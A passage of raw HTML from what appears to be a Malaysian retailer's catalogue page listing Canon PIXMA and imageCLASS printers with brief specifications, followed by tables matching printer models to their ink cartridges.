Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing</p><p>This compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.</p><p>Print, Scan, Copy, Fax</p><p>ISO standard print speed (A4): 8.8ipm black / 4.4ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct</p><p>Recommended print volume: 50 - 200 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS9570</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>A3 Wireless Photo Printer with Large 4.3â€ Touch-Screen and Auto Document Feeder</p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 80 - 300 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA TS8270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Wireless Photo All-In-One with Large 4.3â€ Touch-Screen and Auto Duplex Printing</p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.</p><p>Available in Black, Red and White.</p><p>Print, Scan, Copy</p><p>ISO standard print speed (A4): up to 15.0ipm black / 10.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct</p><p>Recommended print volume: 30 - 100 pages</p><center></center><center></center><center></center><center></center><center></center><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G2010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G4010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/095399e7118a4e898b6df8c1808358de_g4010_03-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost.</p><p>Print, Scan, Copy and Fax</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G1010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Printer for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print</p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) / 5.0ipm (colour)</p><p>Photo Speed (4 x 6\"): 60sec. (borderless)</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA G3010</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/abbc0420f899426c86b9f547f8e0476d_g3010_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing</p><p>Designed for high volume printing at low running cost</p><p>Print, Scan &amp; Copy</p><p>ISO Standard print speed (A4): up to 8.8ipm black / 5.0ipm colour</p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode</p><p>Recommended print volume: 150 - 1500 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h2>Laser Printers :-</h2>		\n			<h4>imageCLASS LBP113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p><strong>Compact with wireless connectivity</strong></p><p>Simple to operate and compact in size, the ideal choice for your printing needs.</p><ul><li>Print</li><li>Print Speed (A4): Up to 22ppm</li><li>Recommended monthly print volume: 250 - 2,500 pages</li><li>First Print Out Time (A4): Approx. 6.5 sec</li><li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li><li>Mobile Connectivity.</li></ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF269dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/14e8362b0db44a5daaf2af034760fc58_MF269dw-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)</strong></p>\nEnjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF266dn</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/f8389aa599cc42db986e698ac364f9fc_MF266dn-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>The Multifunction printing solution with Mobile Printing and Network</strong></p>\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 28ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 5.2 sec</li>\n 	<li>Max. paper input capacity: 251 sheets</li>\n 	<li>Print resolution: 1,200 Ã— 1,200 dpi (equivalent)</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/7583474b04984f42b18e94fe91075ec9_MF913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF113w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact All-in-One with wireless connectivity</strong></p>\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\n<ul>\n 	<li>Print, Scan, Copy</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>FPOT: Approx. 6.5 sec</li>\n 	<li>Max. paper input capacity: Up to 150 sheets</li>\n 	<li>Print resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>\n			<h4>imageCLASS LBP913w</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact with wireless connectivity, bundled with 3 cartridges</strong></p>\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\n<ul>\n 	<li>Print</li>\n 	<li>Print Speed (A4): Up to 22ppm</li>\n 	<li>Recommended monthly print volume: 250 - 2,500 pages</li>\n 	<li>First Print Out Time (A4): Approx. 6.5 sec</li>\n 	<li>Print Resolution: Up to 2,400 (equivalent) Ã— 600 dpi</li>\n 	<li>Mobile Printing</li>\n</ul><center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF525x</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 43ppm</li>\n 	<li>Recommended monthly print volume: 2,000 - 7,500 pages</li>\n 	<li>FPOT: 6.2secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 2,300 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h4>imageCLASS MF426dw</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n<p><strong>Compact 4-in-1 Black and White Multifunction for the smart business</strong></p>\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\n<ul>\n 	<li>Print, Scan, Copy, Fax</li>\n 	<li>Print Speed (A4): Up to 38ppm</li>\n 	<li>Recommended monthly print volume: 750 - 4,000 pages</li>\n 	<li>FPOT: 5.5secs. (A4)</li>\n 	<li>Max. paper input capacity: Up to 900 sheets</li>\n 	<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)</li>\n</ul>\n<center>[maxbutton id=\"11\" ]</center>		\n			<h2>Cartridge Printers :-</h2>		\n		    <table width=\"378\" border=\"1\">\n      <tbody>\n      <tr>\n        <td width=\"170\"><strong>Model</strong></td>\n        <td width=\"208\"><strong>Cartridge / Bottle</strong></td>\n      </tr>\n      <tr>\n        <td rowspan=\"13\" align=\"center\">imagePROGRAF PRO-500</td>\n        <td>Maintenance Cartridge MC-20</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Blue)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Chroma Optimizer)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Gray)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Matte Black)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Black)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Cyan)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Gray)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Photo Magenta)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Red)</td>\n      </tr>\n      <tr>\n        <td>PFI-50 (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY iB4170</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n        <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5070</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5170</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5370</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"8\" align=\"center\">MAXIFY MB5470</td>\n        <td>PGI-2700 (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Magenta)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700 (Yellow)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Black)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Cyan)</td>\n      </tr>\n      <tr>\n        <td>PGI-2700XL (Magenta)</td>\n        </tr>\n      <tr>\n        <td>PGI-2700XL (Yellow)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"3\" align=\"center\">PIXMA E3170</td>\n        <td>CL-57 (Colour)</td>\n      </tr>\n      <tr>\n        <td>CL-57S (Colour)</td>\n      </tr>\n      <tr>\n        <td>PG-47 (Pigment Black)</td>\n      </tr>\n      <tr>\n        <td rowspan=\"3\" align=\"center\">PIXMA E410</td>\n        <td>CL-57 (Colour)</td>\n      </tr>\n      <tr>\n        <td>CL-57S (Colour)</td>\n      </tr>\n      <tr>\n        <td>PG-47 (Pigment Black)</td>\n      </tr>\n      </tbody>\n    </table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA E4270</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E470</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E477</p></td><td width=\"208\"><p>CL-57S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E480</p></td><td width=\"208\"><p>CL-57 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-47 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E510</p></td><td width=\"208\"><p>CL-98 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-88 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA E560 / E560R</p></td><td width=\"208\"><p>CL-99 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-89 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G1010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G2010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3000</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G3010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA G4010</p></td><td width=\"208\"><p>GI-790 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>GI-790 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP100</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP110 (with battery)</p></td><td width=\"208\"><p>CLI-36 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-35 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP1300</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2770 / iP2772</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP2870S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA iP4200</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP7270</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL 